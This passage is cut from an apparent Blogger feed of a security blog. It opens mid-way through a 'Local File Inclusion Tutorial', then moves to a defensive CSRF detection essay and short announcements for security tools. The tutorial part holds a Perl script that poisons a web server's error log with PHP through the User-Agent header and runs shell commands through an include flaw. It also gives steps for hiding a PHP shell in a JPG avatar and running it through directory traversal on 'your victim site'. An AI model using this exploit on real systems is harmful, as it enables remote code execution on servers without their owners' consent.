HTTP/1.1\r\n";&lt;br /&gt;print $socket "User-Agent: ".$code."\r\n";&lt;br /&gt;print $socket "Host: ".$site."\r\n";&lt;br /&gt;print $socket "Connection: close\r\n\r\n";&lt;br /&gt;close($socket);&lt;br /&gt;print "\nCode $code sucssefully injected in $log \n";&lt;br /&gt;&lt;br /&gt;print "\nType command to run or exit to end: ";&lt;br /&gt;$cmd = &lt;stdin&gt;;&lt;br /&gt;&lt;br /&gt;while($cmd !~ "exit") {&lt;br /&gt;&lt;br /&gt;$socket = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;"tcp", PeerAddr=&amp;gt;"$site", PeerPort=&amp;gt;"80") or die "\nConnection Failed.\n\n";&lt;br /&gt;print $socket "GET ".$path."&lt;b&gt;index.php=&lt;/b&gt;".$log."&amp;amp;cmd=$cmd HTTP/1.1\r\n";&lt;br /&gt;print $socket "Host: ".$site."\r\n";&lt;br /&gt;print $socket "Accept: */*\r\n";&lt;br /&gt;print $socket "Connection: close\r\n\n";&lt;br /&gt;&lt;br /&gt;while ($show = &amp;lt;$socket&amp;gt;)&lt;br /&gt;{&lt;br /&gt;print $show;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;print "Type command to run or exit to end: ";&lt;br /&gt;$cmd = &lt;stdin&gt;;&lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;Copy/paste that, save it as whatever.pl and change what is in &lt;b&gt;bold&lt;/b&gt; accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!&lt;br /&gt;&lt;br /&gt;That script will inject the code and then will ask you for a command to run on the server! You know what to do now! :secret.gif&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications. &lt;br /&gt;You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website! &lt;br /&gt;&lt;br /&gt;This is a quick explanation, for a better understanding you can view the video at &lt;u&gt;&lt;a href="http://www.anonym.to/?http://www.milw0rm.com/video/watch.php?id=57" target="_blank"&gt;http://www.milw0rm.com/video/watch.php?id=57&lt;/a&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the &lt;u&gt;edjpgcom download &lt;/u&gt;&lt;a href="http://www.anonym.to/?http://software.security-shell.com/index.php?dir=&amp;amp;file=edjpgcom.zip" target="_blank"&gt;http://software.security-shell.com/i...e=edjpgcom.zip&lt;/a&gt;program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in &lt;b&gt;/home/sitefolder/public_html/&lt;/b&gt;includes/view.php on line 37                                 &lt;br /&gt;If you can't force an error go back to the etc/passwd file:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;username:kbeMVnZM0oL7I:503:100:FullName:&lt;b&gt;/home/username&lt;/b&gt;:/bin/sh                                 &lt;br /&gt;As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.&lt;br /&gt;&lt;br /&gt;In your browser type this (again, the nr of ../ may vary):&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;victim.com/index.php=../../../../../../../../../home/&lt;b&gt;the_other_site_dir&lt;/b&gt;/public_html/&lt;b&gt;path_to_your_avatar&lt;/b&gt;/avatar.jpg                                 &lt;br /&gt;In order "words" should look like this (using fictitious "names"):&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg &lt;br /&gt;After you type this you will see the result of the code inserted in the image! &lt;/stdin&gt;&lt;/stdin&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2519854956598745140?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2519854956598745140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2011/08/local-file-inclusion-tutorial-part-1-of.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2519854956598745140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2519854956598745140'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2011/08/local-file-inclusion-tutorial-part-1-of.html' title='Local File Inclusion Tutorial Part 1 of 4'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2560240248121161667</id><published>2011-08-13T18:16:00.001+08:00</published><updated>2011-08-13T18:19:53.629+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>HexorBase v1.0 - Database Hacking Tool</title><content type='html'>HexorBase is a database application  designed for administering and auditing multiple database servers  simultaneously from a centralized location, it is capable of performing  SQL queries and bruteforce attacks against common database servers  (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase  allows packet routing through proxies or even metasploit pivoting antics  to communicate with remotely inaccessible servers which are hidden  within local subnets.&lt;br /&gt;&lt;br /&gt;&lt;iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/xUxZknFAAII" width="425"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;You can download it here : &lt;a href="http://code.google.com/p/hexorbase/downloads/list"&gt;Hexorbase Database Ethical Hacking Tool&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2560240248121161667?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2560240248121161667/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2011/08/hexorbase-v10-database-hacking-tool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2560240248121161667'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2560240248121161667'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2011/08/hexorbase-v10-database-hacking-tool.html' title='HexorBase v1.0 - Database Hacking Tool'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/xUxZknFAAII/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8159961653926500919</id><published>2011-08-06T11:51:00.001+08:00</published><updated>2011-08-07T15:26:36.180+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CSRF'/><title type='text'>Detecting Cross-Site Request Forgery (CSRF)</title><content type='html'>Cross-Site Request Forgery  (CSRF) generates many questions from prospects, customers, partners,  and Web application security professionals we work with. The questions  tend to fall into similar categories, so we figured it would be helpful  to summarize them and share our perspective on CSRF. We would definitely  appreciate feedback and/or debate from the community to help  battle-test our approach.&lt;br /&gt;&lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="text-decoration: underline;"&gt;The 5 Most Often Asked &lt;/span&gt;&lt;/b&gt;&lt;b&gt;Q&lt;span style="text-decoration: underline;"&gt;uestions about CSRF&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;What is CSRF?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;How do we decide which CSRF to report?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;How do software security tools find CSRF today? &lt;/b&gt;&lt;br /&gt;&lt;b&gt;How do we test for CSRF?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Why do we consider CSRF unresolved if there are XSS or HTTP Response Splitting vulnerabilities present in the website?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;First, what is CSRF?&lt;/b&gt;&lt;br /&gt;At  a high level, CSRF means an attacker can force a victim’s Web browser  to make a request to a website of the attacker’s choosing, but the  victim’s own Web browser makes the request. Of course, the ability of  one’s own Web browser to make transparent requests to multiple websites  is a fundamental design principle of the Web. For example, iFrames and  Web 2.0 widgets perform legitimate actions like CSRF on websites all the  time. The simplest form of CSRF is to embed content in one domain from  another domain in a frame, which forces users’ browsers to make  off-domain requests they may not realize they’re making. Another  legitimate form of CSRF is to make a javascript-driven request to  another website. In early Internet days many sites combined the use of  frames and CSRF to share URL parameters between sites. I call this “The  poor man’s Web service.”&lt;br /&gt;Obviously there is potential for abuse  when an attacker can make victims request a resource they want to avoid  requesting, such as installing malware, changing a password to an  attacker-controlled value, bidding on an unwanted item, etc. However, as  noted above, there are legitimate uses for CSRF,&amp;nbsp; including pulling in  off-domain “Web 2.0″ JavaScript widgets, and sourcing in an image.&lt;br /&gt;Basically,  CSRF has a legitimate use-case to access almost every resource − from  pages to forms − on most websites. Yet from a security perspective &lt;span style="text-decoration: underline;"&gt;we are only interested in the abuse-cases&lt;/span&gt;.&lt;br /&gt;So how do we distinguish between the legitimate use-cases and the &lt;i&gt;abuse-cases&lt;/i&gt; for CSRF?&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How does WhiteHat Security decide which CSRF to report?&lt;/b&gt;&lt;br /&gt;At WhiteHat we define CSRF as a vulnerability when an attacker can execute CSRF against any of three types of resources:&lt;br /&gt;1.&amp;nbsp; Where security decisions are made.&lt;br /&gt;2.&amp;nbsp; Where an attacker can use CSRF to force arbitrary code injection that impacts one or more users.&lt;br /&gt;3.&amp;nbsp; Where a transaction occurs involving the transfer of money or goods.&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;Exam&lt;/span&gt;p&lt;span style="text-decoration: underline;"&gt;les of decision-making &lt;/span&gt;p&lt;span style="text-decoration: underline;"&gt;rocesses that com&lt;/span&gt;p&lt;span style="text-decoration: underline;"&gt;romise securit&lt;/span&gt;y&lt;span style="text-decoration: underline;"&gt; include:&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Password Reset / User Account modification − authorization (Auth/Z) decision bypassed&lt;/li&gt;&lt;li&gt;Add contact or “friend” − confidentiality compromise based on assumption of user Auth/Z&lt;/li&gt;&lt;/ul&gt;&lt;span style="text-decoration: underline;"&gt;Examples of CSRF forcing arbitrar&lt;/span&gt;y&lt;span style="text-decoration: underline;"&gt; code injection&lt;/span&gt;:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Send  contact Web-based IM / message including an attack such as Cross-Site  Scripting – compromise of authorization and confidentiality&lt;/li&gt;&lt;li&gt;Force user to malware/DbD&amp;nbsp; (Drive-by Download) resource or revenue-cookie-stuffing resource – again compromise of confidentiality and Auth/Z&lt;/li&gt;&lt;/ul&gt;&lt;span style="text-decoration: underline;"&gt;Examples of compromised transaction processes&lt;/span&gt;:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Bid on, or purchase of, unwanted/unexpected item&lt;/li&gt;&lt;li&gt;Change the “Ship To:” address field during legitimate user purchase&lt;/li&gt;&lt;li&gt;Submit stock trading requests, front-run user decisions, or manipulate the market&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Compared  to most design flaws, CSRF typically has a larger subjective “grey  area” when defining which CSRF are vulnerabilities. We often find that a  CSRF flaw requires more explanation in order for businesses to  understand how CSRF puts their websites at risk compared to other design  weaknesses. Consequently, the above definitions help us focus on – and  give customers an understanding of – the CSRFs that can have negative  impact on their security and their business.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How do software security tools find CSRF today?&lt;/b&gt;&lt;br /&gt;CSRF  is clearly a “Design Flaw / Business Logic” vulnerability or, from a  software perspective, an error of omission at specification time.  Specifications that address security abuse-cases are commonly omitted –  in the password-reset CSRF example  we provide below – the missing specification is “only  authenticatedEntity actors should be able to reset their own passwords.”  Given the context of omission – and given DAST’s strength at finding  errors of omission – CSRF is most easily identified by Dynamic Analysis  Software Testing (DAST). While it is possible to identify weak  design-patterns in source code, such as the password-reset example, we  find in practice that the majority of dangerous CSRFs &lt;i&gt;are not identified&lt;/i&gt; by either Static Analysis Software Testing (SAST) or human source-code reviews.&lt;br /&gt;It appears DAST Web application vulnerability scanners approach CSRF in one of three ways:&lt;br /&gt;1. False-Negatives (FN): Do not test for CSRF.&lt;br /&gt;2. False-Positives  (FP): After scanning a website for vulnerabilities, attempt to replay  every request reporting all successfully replayed requests – both  idempotent and non-idempotent − as “Potential CSRF” regardless of  security impact.&lt;br /&gt;3. False-Negatives + False-Positives: Attempt to  replay all non-idempotent POST requests/forms, and flag all successful  replays as “CSRF Vulnerabilities.”&lt;br /&gt;There are two big problems with  approaching CSRF-testing automation in the three ways listed above.  First, the problem of false negatives: Obviously, the scanners that  ignore CSRF generate FNs. However, we have observed that most scanners  tend to ignore both dynamically created forms and JSON requests (GET and  POST) in their CSRF results. We are uncertain whether this oversight is  an attempt to reduce false-positives (many JSON requests will have no  CSRF security implications) or simply an artifact of current scanner  limitations in executing javascript and/or testing DOM-based forms that  require user interaction. Possibly, both factors result in the presence  of false negatives.&lt;br /&gt;The second important FN gap is that scanners  fail to identify CSRFs that facilitate arbitrary code execution. This is  particularly a problem in the case of persistent code injection, which  can be used to make XSS/CSRF worms such as the Samy Worm on MySpace.&lt;br /&gt;False  positives: The two scanner approaches just mentioned generate a massive  amount of false positives for scanner users to sort through as they  look for the proverbial “vulnerable needle in the haystack.” We’ve  learned that most users eventually turn off the CSRF testing features;  otherwise, they find themselves overwhelmed with many more results than  they can possibly sort. Recently, a few scanners have tried to “tune  down” the number of false positives, using some form of keyword  signature matching in order to filter the false positives and raise  their potential priority. This is actually one of the approaches that Sentinel uses, and has shown some merit. &lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How does WhiteHat Security test for CSRF?&lt;/b&gt;&lt;br /&gt;WhiteHat’s Sentinel Service uses a combination of automation and customized tests generated by engineers in our Threat Research Center (TRC) to test for CFSR. Because CSRF is a business logic issue it is handled under the testing domain of our Sentinel Premium Edition (PE) service.  One of the unique features of Sentinel PE is that our TRC engineers map  out the application and teach Sentinel how to navigate logic and  workflows, as well as how to create user comparison tests that usually  reach across multiple users and multiple roles.&lt;br /&gt;During this  initial testing process we flag key areas that meet our three  “actionable” CSRF criteria defined above and test them for  replay-ability. As part of the ongoing scanning process, Sentinel PE  also identifies new code and opens tickets that TRC engineers use to  custom configure Sentinel in order to test those functions. Because most  CSRF occurs in forms / POST requests it is relatively easy to capture  these new functions and new features as they are released in the Web  application. Of course detecting vulnerabilities in new code as it is  pushed requires scanning the application on an ongoing basis.&lt;br /&gt;WhiteHat  also reviews every application covered by Sentinel PE service on a  yearly cycle to determine whether new design patterns or coding  practices have been introduced that Sentinel might otherwise overlook.  For example, a new type of Web-remoting  library could expose an application to CSRF without Sentinel  automatically detecting it. Therefore, our standard practice is to  customize and configure Sentinel for all sites we assess whenever a new  design pattern or programming practice is identified.&lt;br /&gt;&lt;b&gt;On to Sentinel automation&lt;/b&gt; – specifically: automating the detection of Weak Design Patterns.  During the past four years we’ve learned a lot about CSRF while testing  thousands of Web applications. One of the discoveries is that some  CSRFs occur in common, weak design-patterns that can often be described  with a high degree of accuracy. For these cases we’ve built an automated  battery of “Known Bad CSRF conditions” that Sentinel searches for. As  an example, let’s consider the obvious password-reset design:&lt;br /&gt;If Sentinel discovers a password-reset function  that has only two input fields that both accept the same input and can  be replayed, there is an extremely high likelihood that the function is  CSRFable with clear security implications. Likewise, this same pattern  will flag the section in a new-user account registration workflow, which  is private to the user-session and located where the user first creates  a password. In some cases the initial password-creation function can be  re-invoked via CSRF, and then used to reset the user’s existing  password after the account is created.&lt;br /&gt;There are several other  examples, similar to the one just described above, where describing the  replay criteria is fairly straightforward once you know the name of the  form or function involved in the decision / transaction.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Why  does WhiteHat Security consider CSRF unresolved if there are Cross-Site  Scripting (XSS) or HTTP Response Splitting (HTTP/RS) vulnerabilities  present in the website?&lt;/b&gt;&lt;br /&gt;Most anti-CSRF controls involve embedding a Dynamic Authorization Token  (DAT), a token that is a one-time-use, mathematically unique nounce,  into each request. Presumably, users who have not legitimately requested  a page would not have the DAT required to successfully submit a  CSRFable form on that page. However, if any part of the Web application  is vulnerable to XSS or HTTP/RS,  then an attacker can bypass the CSRF protection. For the sake of  specificity, let’s call an HTTP/RS vulnerability in a resource that  facilitates XSS: “XSS++”.&lt;br /&gt;Specifically, the attacker will first  force the victim to make a CSRF request to the XSS/++ vulnerable  website, injecting the attacker’s XSS/++ attack code into the  application. That XSS/++ attack will then execute in the victim’s  browser, making a CSRF request to the protected resource, and will then  parse the DAT required to make the protected request from the response.  Finally, the attack will resend the malicious CSRF request, including  the DAT that is intended to protect it. In effect, XSS/++ neuters the  effectiveness of token-based CSRF compensating controls.&lt;br /&gt;Because  the attacker can force a legitimate user to CSRF an XSS/++ attack  anywhere in a Web application, it is essential to remember that all  XSS/++ are equally vulnerable to the attacker in this scenario. If the  victim is logged in, &lt;i&gt;it does not matter&lt;/i&gt; &lt;i&gt;if the XSS/++ vulnerability requires authentication&lt;/i&gt;. And &lt;i&gt;it does not matter&lt;/i&gt; &lt;i&gt;if the XSS/++ is persistent or reflected&lt;/i&gt;.  What does matter is to know this: All XSS/++ can be attacked equally.  While persistent XSS can certainly have a larger impact over time, in  regards to this specific attack scenario, all XSS attack vectors are  equal.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusion &lt;/b&gt;&lt;br /&gt;Let’s wrap up  this section with a concrete, real-world example of how a seemingly  “benign” CSRF can be combined with other vulnerabilities, including XSS,  to completely compromise a system. Here are the parameters: A website  has no obvious CSRF vulnerabilities, but it is vulnerable to XSS, and  has a Local-File Include vulnerability that potentially could allow  arbitrary server-side code execution. The vulnerable application also  includes a “file-upload” feature, but because you cannot CSRF the  file-upload cross-domain, most scanners will ignore this particular  CSRF. However, the attacker can combine CSRF + XSS + the Local File  Include vulnerabilities to completely compromise the website, the Web  server, and the operating system − remotely − in this scenario.&lt;br /&gt;Here’s  how it’s done: A user of the vulnerable website visits another website  that the attacker has already hacked. The hacked website forces the  user’s browser to make a CSRF attack that injects an XSS attack payload  into the vulnerable website. The XSS attack fetches the attacker’s  malicious PHP file, uploads it, and then exploits the Local File Include  design flaw to execute the malicious PHP file on the server, taking  complete control of the system − a system that appeared free from CSRF  attack. All of this malicious activity occurs without the attacker  making a single click, and the victim is completely unaware that  anything has happened. In this manner, a seemingly innocent CSRF can be  combined with other potential and known vulnerabilities to produce  disastrous results.&lt;br /&gt;Given these facts, if you have CSRF  vulnerabilities that present real risks, it is tactically imperative to  fix all of your XSS and HTTP/RS vulnerabilities while simultaneously  building your CSRF protections. It is equally important to have both an  ongoing website risk measurement and testing program that can identify  new XSS and HTTP/RS that appear in new code as it is released, as well  as a process in place to remediate the new vulnerabilities quickly.  Otherwise – your CSRF vulnerabilities will always be exploitable – and  your Window of Exposure to CSRF in your Web applications will be open  “All Year Long.”&lt;br /&gt;There are other ways to improve both software  designs and development processes in the SDLC in order to reduce XSS,  XSS++, and in the CSRF in new code you write. However, that subject in  itself is vast and requires a longer discussion.&lt;br /&gt;In summary, for  the purpose of measuring and managing risk to your organization from  CSRF in applications that: (1) you own; (2) you control; (3) you don’t  own; (4) and/or that you can’t control, you must have − at a minimum −  an ongoing tactical Web security measurement and response program for  CSRF, XSS, and XSS++.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8159961653926500919?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8159961653926500919/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2011/08/detecting-cross-site-request-forgery.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8159961653926500919'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8159961653926500919'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2011/08/detecting-cross-site-request-forgery.html' title='Detecting Cross-Site Request Forgery (CSRF)'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5715618891377198318</id><published>2010-08-23T19:31:00.000+08:00</published><updated>2010-08-23T19:34:38.428+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Forensic Toolkit (FTK) Version 3</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vUW0F0UxPvk/THJbsTnBueI/AAAAAAAAANA/XUNCrCALdJw/s1600/FTK+Forensic+Toolkit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://3.bp.blogspot.com/_vUW0F0UxPvk/THJbsTnBueI/AAAAAAAAANA/XUNCrCALdJw/s200/FTK+Forensic+Toolkit.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;THE INDUSTRY-STANDARD COMPUTER FORENSICS SOFTWARE USED BY GOVERNMENT AGENCIES AND LAW ENFORCEMENT AROUND THE WORLD &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Forensic Toolkit® (FTK®) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface. FTK 3 is built for speed, analytics and enterprise-class scalability. Known for its intuitive interface, email analysis, customizable data views and stability, FTK lays the framework for seamless expansion, so your computer forensics solution can grow with your organization’s needs. Forensic Toolkit 3 is now the most advanced computer forensics software available, providing functionality that normally only organizations with tens of thousands of dollars could afford. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download:&lt;/span&gt; &lt;a href="http://www.accessdata.com/ftk/ad_ftk312_ftp.aspx"&gt;http://www.accessdata.com&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;See also &lt;a href="https://blogs.sans.org/computer-forensics/2010/08/09/review-access-data-forensic-toolkit-ftk-version-3-part-1/"&gt;Review: Access Data Forensic Toolkit (FTK) Version 3 — Part 1&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5715618891377198318?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5715618891377198318/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/08/forensic-toolkit-ftk-version-3.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5715618891377198318'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5715618891377198318'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/08/forensic-toolkit-ftk-version-3.html' title='Forensic Toolkit (FTK) Version 3'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_vUW0F0UxPvk/THJbsTnBueI/AAAAAAAAANA/XUNCrCALdJw/s72-c/FTK+Forensic+Toolkit.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6596222793367806356</id><published>2010-08-08T11:21:00.000+08:00</published><updated>2010-08-23T19:34:38.429+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>BackTrack 4 Release 1</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_xJ5LrusWfss/TFrouBL57nI/AAAAAAAAAg0/WCFHqEhX9RI/s1600/snapshot1-bt4r1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://2.bp.blogspot.com/_xJ5LrusWfss/TFrouBL57nI/AAAAAAAAAg0/WCFHqEhX9RI/s200/snapshot1-bt4r1.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The BackTrack Team is proud to announce the public release of BackTrack 4  R1.At the risk of sounding like a broken record,we believe this version  is by far the best version released to date.With a shiny new 2.6.34  kernel,there are many significant improvements,such as expanded hardware  support,and improved desktop responsiveness  &lt;br /&gt;&lt;br /&gt;Tools have been  updated systemwide, and a full Fluxbox desktop environment has been  added.A walk-around for the rt28xx driver has been implemented (for all  you AWUS050NH owners).&lt;br /&gt;The VMWare version has complete integration  with VMWare Tools,which provides a seamless interaction with BackTrack  in a virtual environment.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;More info and download:&lt;/span&gt; &lt;a href="http://www.backtrack-linux.org/backtrack/backtrack-4-r1-public-release/"&gt;http://www.backtrack-linux.org&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6596222793367806356?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6596222793367806356/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/08/backtrack-4-release-1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6596222793367806356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6596222793367806356'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/08/backtrack-4-release-1.html' title='BackTrack 4 Release 1'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_xJ5LrusWfss/TFrouBL57nI/AAAAAAAAAg0/WCFHqEhX9RI/s72-c/snapshot1-bt4r1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6850838443342656428</id><published>2010-08-02T11:28:00.002+08:00</published><updated>2010-08-02T11:28:00.303+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>OWASP O2 Platform v1.1 Beta</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_xJ5LrusWfss/TDY4MbjDAPI/AAAAAAAAAfM/ldA0sBIipfk/s1600/7_5_2010_3_18_24_PM_tmp90A4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="124" src="http://1.bp.blogspot.com/_xJ5LrusWfss/TDY4MbjDAPI/AAAAAAAAAfM/ldA0sBIipfk/s200/7_5_2010_3_18_24_PM_tmp90A4.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The OWASP O2 Platform is an OWASP Project which is a collection of Open  Source modules that help Web Application Security Professionals to  maximize their efforts and quickly obtain high visibility into an  application's security 